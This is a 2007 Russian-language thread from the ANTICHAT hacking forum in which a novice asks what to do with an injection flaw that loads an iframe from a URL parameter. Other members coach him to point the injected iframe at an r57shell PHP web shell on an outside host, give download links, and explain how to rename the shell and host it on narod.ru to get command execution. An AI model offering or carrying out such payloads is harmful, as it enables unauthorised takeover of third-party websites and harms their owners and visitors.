HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Xss->...
  #1  
Старый 15.10.2007, 16:56
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
Question Xss->...

Есть уязвимость которая позволяет подставить
Код:
%3CIFRAME%20SRC=http://ha.ckers.org/scriptlet.html%20%3C
в запрос и выскочит окно с xss (точнее окно _http://ha.ckers.org/scriptlet.html) Что еще можно загрузить на эту страницу? (не вообще что только можно, а что-то полезное для себя)
 

  #2  
Старый 15.10.2007, 17:02
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

Цитата:
<SCRIPT LANGUAGE="JavaScript">alert('XSS')</SCRIPT>
может это инклуд а не xss!? xss исполняется на уязвимом сайте
если это инклуд ты можешь сделать так

%3CIFRAME%20SRC=http://ya.ru идолжен появится яндекс

или так
%3CIFRAME%20SRC=http://hack.net/r57shell.php

Последний раз редактировалось kair; 15.10.2007 в 17:07..
 

  #3  
Старый 15.10.2007, 17:05
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
По умолчанию

Код:
%3CIFRAME%20SRC=http://ya.ru%20%3C
яндекс появился))
Код:
%3CIFRAME%20SRC=http://hack.net/r57shell.php
- что это даст?

Последний раз редактировалось Qwertison; 15.10.2007 в 17:08..
 

  #4  
Старый 15.10.2007, 17:08
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

значит это инклуд!!! подставляй вместо яндекса шелл
 

  #5  
Старый 15.10.2007, 17:10
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
По умолчанию

инклуд!!инклуд!!(что это такое?) шелла там нет где ты указал(
 

  #6  
Старый 15.10.2007, 17:13
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

http://www.security-frog.org/hack/r57shell-inversa.txt
и выполняй команды
можешь взять любой шелл по адресу
https://forum.antichat.ru/thread20314.html

Последний раз редактировалось kair; 15.10.2007 в 17:18..
 

  #7  
Старый 15.10.2007, 17:18
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
По умолчанию

как команды выполнять? вылезло окошечко такое же как и на __http://www.security-frog.org/hack/r57shell-inversa.txt__ Всмысле текст тхт, нет меню как у залитого шелла...
 

  #8  
Старый 15.10.2007, 17:19
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
С нами: 10305026

Репутация: 187
По умолчанию

вместо txt пиши php
%3CIFRAME%20SRC=http://www.security-frog.org/hack/r57shell-inversa.php
 

  #9  
Старый 15.10.2007, 17:21
Qwertison
Познающий
Регистрация: 01.04.2007
Сообщений: 43
С нами: 10058475

Репутация: -5
По умолчанию

Error 404!

/hack/r57shell-inversa.php
File Not Found!
 

  #10  
Старый 15.10.2007, 17:55
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
С нами: 10246130

Репутация: 141
По умолчанию

Цитата:
Error 404!

/hack/r57shell-inversa.php
File Not Found!
Сохрани этот файл у себя на компе, переименуй в .php, загрузи на народ.ру и подставляй адрес до него.
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Продаю самые Красивые номера. Красивые 5,6 знаки. Кирпич ICQ - Покупка, продажа 3 09.04.2004 18:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...